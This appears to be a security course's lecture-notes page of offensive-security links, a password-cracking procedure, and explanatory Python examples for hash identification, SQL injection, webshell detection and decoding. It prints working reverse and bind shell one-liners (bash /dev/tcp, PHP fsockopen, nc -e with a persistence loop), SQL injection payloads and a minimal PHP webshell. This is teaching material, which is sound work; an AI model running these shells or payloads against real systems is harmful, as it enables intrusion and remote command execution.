
Cybersecurity Lecture notes


Last updated 1 year ago

This page lists interesting links related to computer security (tools, information, tutorials, interesting sites, resources).

Interesting links

PrivESC

Reverse shell

Steganography

Tools

How to crack a password

  1. Identify the type of hash

  • https://hashes.com/en/tools/hash_identifier

  2. Use John the Ripper (already installed on Kali)

  • https://fr.wikipedia.org/wiki/John_the_Ripper

  • https://myhackingworld.com/crack-passwords-with-john-the-ripper/

  3. Use a custom wordlist with John the Ripper

  • https://gitlab.com/kalilinux/packages/wordlists/blob/kali/master/rockyou.txt.gz
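Step 1 of the procedure above, worked through in code. This is an added example, not part of the original notes: it narrows a hash down to its format from the text alone, the same job the linked online identifier does. Prefixed schemes (bcrypt, sha512crypt, argon2) can be named with certainty; a bare hex digest only tells you its length, so those come back as a candidate list. The prefix table and the sample hashes are assumptions constructed for the example, and the `slow` flag is there to make the defender's point: an unsalted fast digest is what step 2's wordlist attack breaks cheaply, a deliberately slow salted scheme is not.

```python
import re

# Modular-crypt style prefixes and whether the scheme is deliberately slow.
# Assumption: the common set, not an exhaustive one.
PREFIXED = {
    "$1$": ("md5crypt", True),
    "$2a$": ("bcrypt", True),
    "$2b$": ("bcrypt", True),
    "$2y$": ("bcrypt", True),
    "$5$": ("sha256crypt", True),
    "$6$": ("sha512crypt", True),
    "$argon2i$": ("argon2i", True),
    "$argon2id$": ("argon2id", True),
    "$pbkdf2-sha256$": ("pbkdf2-sha256", True),
}

# Unsalted hex digests share a length across several algorithms, so a bare
# digest can only be narrowed to a candidate list.  All of these are fast.
HEX_DIGESTS = {
    32: ("MD5", "NTLM", "MD4"),
    40: ("SHA-1", "RIPEMD-160"),
    56: ("SHA-224",),
    64: ("SHA-256", "SHA3-256"),
    96: ("SHA-384",),
    128: ("SHA-512", "SHA3-512", "Whirlpool"),
}


def identify_hash(value):
    """Return (candidates, slow): the possible formats of one hash string and
    whether it is a deliberately expensive, salted scheme."""
    h = value.strip()
    for prefix, (name, slow) in PREFIXED.items():
        if h.startswith(prefix):
            return [name], slow
    if re.fullmatch(r"[0-9a-fA-F]+", h) and len(h) in HEX_DIGESTS:
        return list(HEX_DIGESTS[len(h)]), False
    # pwdump style "LM:NTLM" pair, two 32-hex digests separated by a colon
    if re.fullmatch(r"[0-9a-fA-F]{32}:[0-9a-fA-F]{32}", h):
        return ["LM:NTLM pair"], False
    return ["unknown"], False


def triage(hashes):
    """Split a list of hashes into the ones a wordlist attack is cheap against
    (fast, unsalted) and the ones that are not, keyed by the candidate list."""
    report = {"fast": [], "slow": [], "unknown": []}
    for h in hashes:
        candidates, slow = identify_hash(h)
        if candidates == ["unknown"]:
            report["unknown"].append(h)
        elif slow:
            report["slow"].append((h, candidates[0]))
        else:
            report["fast"].append((h, candidates))
    return report


# Constructed sample hashes (the sha512crypt and bcrypt values are not real digests).
SAMPLE_HASHES = [
    "5f4dcc3b5aa765d61d8327deb882cf99",            # 32 hex: MD5 / NTLM / MD4
    "$6$saltsalt$notarealsha512cryptdigest",        # sha512crypt
    "$2b$12$notarealbcryptsaltandhash",             # bcrypt
    "not-a-hash",
]

if __name__ == "__main__":
    for kind, items in triage(SAMPLE_HASHES).items():
        print(kind, items)
```

The fixed-length rule is the weak spot of every identifier of this kind: a 64-character hex string could be SHA-256, SHA3-256 or any other 256-bit digest, and John's `--format` has to be chosen among those candidates by trying them.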

Reverse/bind shell

# Reverse shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
# Listener side, with a proper tty
socat file:`tty`,raw,echo=0 TCP-L:port
# Bind shell
nc -lvp 4444 -e /bin/bash

# Add a bit of persistence:
while true; do nc -lvp 4444 -e /bin/bash; done

SQL example payloads

https://portswigger.net/web-security/sql-injection/cheat-sheet

user"; --
user" union select 1,2,3,4,@@version; --
user" union select 1,2,3,4,group_concat(schema_name) from information_schema.schemata; --
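The two payload shapes above (comment out the rest of the WHERE clause, append a UNION that returns server data) run against a constructed SQLite table, once through a query built by string formatting and once through a parameterised one. This is an added example, not code from the original notes: the table, rows, credentials and function names are constructed. The notes' payloads use double-quote delimiters; SQLite's portable string delimiter is the single quote, so the example uses that, and `sqlite_version()` stands in for `@@version`.

```python
import sqlite3


def make_db():
    """Constructed sample table: two users, plaintext passwords for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'correct horse')")
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'battery staple')")
    return conn


def vulnerable_login(conn, username, password):
    # Vulnerable on purpose: the input is spliced into the SQL text, so a quote
    # in the username closes the literal and "--" comments out the password check.
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def hardened_login(conn, username, password):
    # Bound parameters: the driver hands the values to SQLite separately from
    # the SQL text, so quotes and comment markers inside them are just characters.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def vulnerable_lookup(conn, username):
    # Same flaw on a query whose rows are echoed back: a UNION appended to the
    # input makes the result set carry rows from a second SELECT.
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql).fetchall()]


def hardened_lookup(conn, username):
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,)).fetchall()]


def run_demo():
    """Run both payload shapes through both query styles and report the outcome."""
    conn = make_db()
    bypass = "admin' --"                          # comment-based check bypass
    union = "' UNION SELECT sqlite_version() --"  # SQLite counterpart of @@version
    return {
        "bypass_vulnerable": vulnerable_login(conn, bypass, "wrong"),
        "bypass_hardened": hardened_login(conn, bypass, "wrong"),
        "union_vulnerable": vulnerable_lookup(conn, union) == [sqlite3.sqlite_version],
        "union_hardened": hardened_lookup(conn, union),
        "legit_hardened": hardened_login(conn, "admin", "correct horse"),
    }


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name}: {outcome}")
```

The point of running both versions side by side is that the hardened functions still return the expected rows for genuine input; the only thing that changes is that the payload strings are compared as data rather than parsed as SQL.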

PHP: the most simple webshell

<?php
    // Runs the "cmd" query parameter as a shell command and echoes its output
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }

// To go further: https://github.com/flozz/p0wny-shell
?>
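The defender's counterpart of the snippet above: a small static check that flags PHP source in which a command-execution sink is fed by request data, which is exactly the pattern a one-line webshell is built on. This is an added example, not part of the original notes. It is a triage heuristic for upload directories, web roots and backups, not a PHP parser: it works line by line and follows only one level of variable assignment. The sink list, the superglobal list and the three sample sources are constructed for the example (the first sample reproduces the page's own snippet).

```python
import re

# Command-execution sinks and the request superglobals that feed them.
SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval")
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*" + SUPERGLOBAL)
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\((.*)\)", re.IGNORECASE)
BACKTICK_RE = re.compile(r"`[^`]*`")  # PHP's backtick operator is shell_exec()


def find_request_to_shell(source):
    """Return [(line_no, sink_name)] for every sink whose argument carries
    request data, either directly or through a variable assigned from it."""
    # Pass 1: variables assigned straight from a request superglobal are tainted.
    tainted = {m.group(1) for m in ASSIGN_RE.finditer(source)}
    taint_patterns = [SUPERGLOBAL] + [r"\$" + re.escape(v) + r"\b" for v in sorted(tainted)]
    taint_re = re.compile("|".join(taint_patterns))

    # Pass 2: report any sink call or backtick expression that mentions a taint source.
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for m in SINK_RE.finditer(line):
            if taint_re.search(m.group(2)):
                findings.append((no, m.group(1).lower()))
        for m in BACKTICK_RE.finditer(line):
            if taint_re.search(m.group(0)):
                findings.append((no, "backtick"))
    return findings


# Constructed samples.  WEBSHELL is the page's own snippet; INDIRECT passes the
# request value through a variable first; BENIGN runs a hard-coded command only.
WEBSHELL = """<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
"""

INDIRECT = """<?php
$c = $_POST['c'];
passthru($c);
"""

BENIGN = """<?php
$listing = shell_exec('ls -la /var/log');
echo $listing;
"""

if __name__ == "__main__":
    for name, src in (("webshell", WEBSHELL), ("indirect", INDIRECT), ("benign", BENIGN)):
        print(name, find_request_to_shell(src))
```

The BENIGN sample shows the deliberate limit of the heuristic: a hard-coded command is not reported, because the signal being looked for is request-controlled execution, not shell use as such. Obfuscated shells (`base64_decode`, variable functions, `$_REQUEST` spread over several statements) slip past a check this simple, which is why it belongs beside file-integrity monitoring of the web root rather than in place of it.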

Challenges

STEP 1

STEP 2

STEP 3

String to decode

427261766f207475206120726575737369206c6520636816c6c656e6765

aidhaSBwZXJkdQ==

26237834373b26237834373b26237832303b26237832313b26237832303b26237837343b26237837353b26237832303b26237836313b26237832303b26237837323b26237836353b26237837353b26237837333b26237837333b26237836393b
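The three strings above are layered encodings of the kind CyberChef (linked further down) unwraps: a hex dump, a base64 string, and a hex dump whose decoded text is itself made of HTML numeric entities. This added example, not part of the original notes, is a small recursive decoder that recognises those three layers and peels them one at a time. It does not decode the page's challenge strings; the inputs in the block are constructed short samples using the same layering. A hex string of odd length is reported as malformed rather than silently truncated, since one dropped nibble shifts every later byte.

```python
import base64
import binascii
import html
import re

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _printable_text(data):
    """Decode bytes as UTF-8 and accept them only if every character is printable;
    this is the stop condition that keeps random bytes from being 'decoded'."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def peel_layer(s):
    """Return (layer_name, decoded_text) for the outermost encoding of s, or None
    when no known layer applies.  Order matters: a hex string is also valid
    base64 text, so hex is tried first."""
    s = s.strip()
    if HEX_RE.match(s):
        if len(s) % 2:
            raise ValueError(f"hex string has odd length ({len(s)}): a nibble is missing or extra")
        text = _printable_text(bytes.fromhex(s))
        if text is not None:
            return ("hex", text)
    if "&#" in s:
        text = html.unescape(s)
        if text != s:
            return ("html-entities", text)
    if B64_RE.match(s) and len(s) % 4 == 0:
        try:
            text = _printable_text(base64.b64decode(s, validate=True))
        except (binascii.Error, ValueError):
            text = None
        if text is not None:
            return ("base64", text)
    return None


def decode_all(s, max_layers=8):
    """Peel layers until none applies; returns (layer_names, final_text)."""
    layers = []
    for _ in range(max_layers):
        step = peel_layer(s)
        if step is None:
            break
        name, s = step
        layers.append(name)
    return layers, s


# Constructed samples mirroring the three encodings on the page.
SAMPLES = [
    "48656c6c6f",                # hex of "Hello"
    "SGVsbG8=",                  # base64 of "Hello"
    "26237834383b26237836393b",  # hex of "&#x48;&#x69;", which unescapes to "Hi"
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", decode_all(sample))
```

The printable check is what makes the loop safe to run blindly: without it, almost any short string of letters decodes as base64 to some bytes, and the decoder would keep "finding" layers that are not there.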

Wifi challenge

WEP - https://ufile.io/h28b15y2

WPA2 - https://ufile.io/3qfmvxzn

-> Tip: dirb/mutations_common

  • RootMe
  • HackTheBox
  • Podcast Le Comptoir Sécu
  • PayloadsAllTheThings
  • Collection of BURP payloads
  • Windows Privilege Escalation Cheat Sheet
  • Linux Privilege Escalation Binary
  • LinEnum
  • Unix privesc
  • Linprivchecker
  • Monitor Linux processes
  • Ngrok: expose ports to the Internet
  • Plink: SSH tunnels on Windows
  • Aperi'Solve performs layer analysis on images
  • CyberChef: encode and decode data
  • Download Kali Linux live 2020.4
  • HTTP - Headers
  • HTTP - User-agent
  • Backup files
  • Path traversal
  • File upload - double extensions
  • File upload - MIME type
  • XSS Injection
  • SQL injection - Authentication
  • Injection (SQL blind)
  • Injection (SQL String)